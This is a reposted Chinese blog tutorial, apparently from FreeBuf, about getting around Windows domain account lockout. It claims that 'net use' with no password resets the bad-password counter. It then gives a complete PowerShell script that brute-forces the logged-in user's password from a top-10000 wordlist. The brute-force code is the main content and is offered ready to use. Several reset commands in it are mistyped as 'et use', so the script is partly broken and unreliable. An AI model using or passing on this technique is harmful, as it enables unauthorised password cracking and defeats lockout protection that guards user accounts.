android域账号认证失败,绕过域账户认证失败锁定次数限制的技巧

原标题:绕过域账户认证失败锁定次数限制的技巧

*本文仅用于教育目的。 切勿在未授权的计算机上进行安全测试。

获取用户帐户密码有很多好方法,这只是另一种方式。 好的,让我们开始吧。核心思路是,用户想要爆破身份验证,他们就可以运行“net use \\%computername%/ u:%username%”命令,该命令可以重新要求身份验证并重置锁定计数。要想进行操作,您需要从Microsoft下载远程服务器管理工具安装该工具后,运行一小段powershell脚本以显示我的JoeUser帐户信息并锁定。

get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto

ef729de9830b5dcb37650eee9342d2ea.png

在我的本地策略中,您可以看到我在3次无效登录尝试后被锁定(我从Microsoft获得的默认安装值)。

64d04c9c457a68adfad4547d29fa34b0.png

接下来我将输入错误的密码,window将记录我的错误次数。

1bcc031e40cd04ac397b70fe766b19ef.png

现在我将使用命令清除错误的密码尝试:“Net use \\%computername%/ u:%username%”注意我没有指定密码。 我已经以用户身份登录,它似乎使用当前用户的上下文进行身份验证,并清除了错误的密码计数!

31c9c9ca46ceaf79405fcb400824b7b3.png

现在我可以使用这种技术爆破密码。 唯一的缺点是我必须在每次设置后删除共享。 例如,现在我已经进行了共享设置,如果我尝试爆破密码,我会收到此消息

b5ea74cd354c4a3fd8f6e9039bf89e90.png

然而只需一条命令即可“Net Use /Delete \\%computername%”

cf6813f6832454fc45ce5a35f87c51b5.png

正式测试,我使用Daniel Miesslers SecLists的前10000名密码列表来爆破。正确的密码也在里面。

$userVar = Get-ChildItem env:username $uname = $userVar.Value $computerVar = Get-ChildItem env:computername $computerName = $computerVar.Value $ErrorActionPreference = "Stop" $hooray = "PasswordNotFoun" $CurrentPath = "C:\Users\Public" $FileName = "10-million-password-list-top-10000.txt" $FName= "$CurrentPath\$FileName" foreach($value in [System.IO.File]::ReadLines($Fname)) { $passAttempt = ('net use \\' + $computerName + ' "' + $value + '"' + '/u:' + $uname ) try { Write-Output ("trying password " + $value) $output = Invoke-Expression $passAttempt | Out-Null $hooray = $value write-output ("FOUND the user password: " + $value) $reset = ('et use \\' + $computername + ' /u:'+ $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('net use /delete \\' + $computername ) Invoke-Expression $deleteShare | Out-Null break } catch { $reset = ('et use \\' + $computername + '/u:' + $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('et use /delete \\'+ $computername ) Invoke-Expression $deleteShare | Out-Null } } write-host "The Password is: "$hooray

af13453f485b14807dba3251e751e0de.png

成功爆破

*参考来源:medium,FB小编周大涛编译,转载请注明来自FreeBuf.COM 返回搜狐,查看更多

责任编辑:

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值